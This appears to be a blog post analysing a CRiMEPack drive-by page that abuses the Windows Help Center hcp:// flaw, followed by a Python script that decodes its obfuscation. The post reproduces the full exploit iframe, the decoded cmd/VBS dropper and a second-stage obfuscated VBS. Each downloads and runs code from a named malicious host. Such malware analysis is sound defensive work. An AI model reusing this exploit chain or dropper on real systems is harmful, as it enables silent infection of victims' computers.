Although it was hyped up online a while ago, malicious sites actually making use of HCP are still rare. I just saw one on the Jianmeng forum (http://bbs.janmeng.com/redirect.php?tid=939059&goto=lastpost#lastpost). The URL is hxxp://www.goodgirlsbadguys.com/zan/hcp.php?type=1&o=xp&b=ff, and the code is recorded below:

This article is from www.sacour.cn; please credit the source when reposting.

To avoid triggering false positives, the code has been converted to full-width characters.
+ I also put together a half-width >> full-width conversion page for convenience; see: http://www.sacour.cn/convert.htm

<iframe src ="hcp://services/search?query=crimepack&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,89,61,34,90,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,119,119,119,46,103,111,111,100,103,105,114,108,115,98,97,100,103,117,121,115,46,99,111,109,47,122,97,110,47,104,99,112,46,112,104,112,63,116,121,112,101,61,51,38,98,61,102,102,38,111,61,120,112,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,84,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,85,32,61,32,84,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,89,58,83,101,116,32,74,61,84,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,85,41,58,74,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,74,46,67,108,111,115,101,58,83,69,84,32,81,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,58,81,46,82,117,110,32,85,32,62,32,37,84,69,77,80,37,92,90,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,90,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,119,109,112,108,97,121,101,114,46,101,120,101)))%3C/script%
3E">

Since this is basically XSS-style code, decoding it is straightforward: just decode the group of numbers at the end. The result is:


cmd /c echo Y="Z.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://www.goodgirlsbadguys.com/zan/hcp.php?type=3&b=ff&o=xp",false:.send():Set T = CreateObject("Scripting.FileSystemObject"):U = T.GetSpecialFolder(2) + "\" + Y:Set J=T.CreateTextFile(U):J.WriteLine .responseText:End With:J.Close:SET Q = CreateObject("WScript.Shell"):Q.Run U > %TEMP%\Z.vbs && %TEMP%\Z.vbs && taskkill /F /IM helpctr.exe && taskkill /F /IM wmplayer.exe

And this is the file: hxxp://www.goodgirlsbadguys.com/zan/hcp.php?type=3&b=ff&o=xp

A closer look at the code shows that this is a malicious page generated by CRiMEPack.

The hcp.php that the previous step downloads to %temp%\z.vbs is, as expected, a VBS file. The SUB V1, SUB V2 ... SUB V76 at the top are all empty procedures, so I removed them. Reading on, the thing looks rather like MS06-014, but because the VBS runs locally, its file-operation privileges are necessarily higher than when it executes remotely, so for this VBS downloading files and the like is easy to do, without the various restrictions that apply when running 014 inside a web page.

In the middle of the code there is a D=StrReverse(...). StrReverse is a string-reversal function, which is also simple to undo: just use Redoce's Decode-7/Reverse. The final result is:
hxxp://www.goodgirlsbadguys.com/zan/load.php?spl=hcp&b=ff&o=xp&i=hcp


Sub A761EVu_5(): I=1: V=false: D = StrReverse("pch=i&px=o&ff=b&pch=lps?php.daol/naz/moc.syugdabslrigdoog.www//:ptth"): Set X = Createobject(StrReverse(Replace("tK191_m118_3cK191_m118_3eK191_m118_3jbK191_m118_3OmK191_m118_3etK191_m118_3syK191_m118_3SeK191_m118_3liK191_m118_3F.K191_m118_3gnK191_m118_3itK191_m118_3pirK191_m118_3cS","K191_m118_3",""))): L = X.GetSpecialFolder(2) & StrReverse("abtuasbv.tab\"): O = StrReverse("TEG"): Set U = CreateObject(StrReverse(Replace("K191_m118_3PTK191_m118_3THK191_m118_3LMK191_m118_3X.K191_m118_32LK191_m118_3MXK191_m118_3SK191_m118_3M","K191_m118_3",""))): Set C = CreateObject(StrReverse(Replace("mK191_m118_3aeK191_m118_3rtK191_m118_3S.BK191_m118_3DK191_m118_3ODK191_m118_3A","K191_m118_3",""))): Set H=Createobject(StrReverse(Replace("tK191_m118_3cejbK191_m118_3OK191_m118_3metsyK191_m118_3SK191_m118_3eliK191_m118_3F.gK191_m118_3nitK191_m118_3pirK191_m118_3cS","K191_m118_3",""))):On Error resume next:U.open O, D, V: U.send() :If U.Status = 200 Then 
     u=U.ResponseBody:C.Open:C.Type = I:C.Write u:C.SaveToFile L:C.Close
     End If:CreateObject(StrReverse("llehS.tpircSW")).eXeC L:CreateObject(StrReverse("llehS.tpircSW")).eXeC StrReverse(Replace("K191_m118_3eK191_m118_3xK191_m118_3eK191_m118_3.K191_m118_3rK191_m118_3eK191_m118_3yK191_m118_3aK191_m118_3lK191_m118_3pmK191_m118_3w MK191_m118_3I/ FK191_m118_3/ lK191_m118_3liK191_m118_3kkK191_m118_3sK191_m118_3atK191_m118_3","K191_m118_3","")):A = X.GetSpecialFolder(2) & "\" & wscript.scriptname:Set J=H.GetFile(A): J.Delete:End Sub:V0
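The two decoding steps described above (the String.fromCharCode number list in the HCP payload, and the StrReverse/Replace junk-string trick in the dropped VBS) are easy to automate for analysis. The following Python script is an added example written for this post, not code from the original page or from the kit; the sample inputs are short fragments taken from the captured code above, and the names of the functions and regexes are my own.

```python
import re

# Layer 1: the HCP URL carries a <script> whose body is a
# String.fromCharCode(n,n,n,...) list of decimal character codes.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

def decode_fromcharcode(js):
    """Return every String.fromCharCode(...) literal found in js, decoded."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in FROMCHARCODE_RE.finditer(js)]

# Layer 2: the dropped VBS hides object names and strings behind
# StrReverse(Replace("<reversed text with junk>", "<junk>", "")) and
# plain StrReverse("<reversed text>") calls.
STRREV_REPLACE_RE = re.compile(
    r'StrReverse\(Replace\("([^"]*)"\s*,\s*"([^"]*)"\s*,\s*""\)\)')
STRREV_RE = re.compile(r'StrReverse\("([^"]*)"\)')

def deobfuscate_vbs(vbs):
    """Rewrite both StrReverse patterns into plain string literals.

    Returns (rewritten_source, recovered_strings_in_order) so an analyst
    can both read the cleaned script and list the hidden values.
    """
    found = []

    def rev_replace(m):  # strip the junk marker first, then reverse
        s = m.group(1).replace(m.group(2), "")[::-1]
        found.append(s)
        return f'"{s}"'

    def rev(m):  # plain reversal
        s = m.group(1)[::-1]
        found.append(s)
        return f'"{s}"'

    vbs = STRREV_REPLACE_RE.sub(rev_replace, vbs)
    vbs = STRREV_RE.sub(rev, vbs)
    return vbs, found

# Constructed sample inputs: the first 11 codes of the HCP payload and one
# Createobject(...) plus the method-name string from the VBS above.
SAMPLE_JS = "eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111)))"
SAMPLE_VBS = ('Set X = Createobject(StrReverse(Replace("tK191_m118_3cK191_m118_3e'
              'K191_m118_3jbK191_m118_3OmK191_m118_3etK191_m118_3syK191_m118_3Se'
              'K191_m118_3liK191_m118_3F.K191_m118_3gnK191_m118_3itK191_m118_3pir'
              'K191_m118_3cS","K191_m118_3",""))): O = StrReverse("TEG")')

if __name__ == "__main__":
    print(decode_fromcharcode(SAMPLE_JS))   # ['cmd /c echo']
    print(deobfuscate_vbs(SAMPLE_VBS)[1])   # ['Scripting.FileSystemObject', 'GET']
```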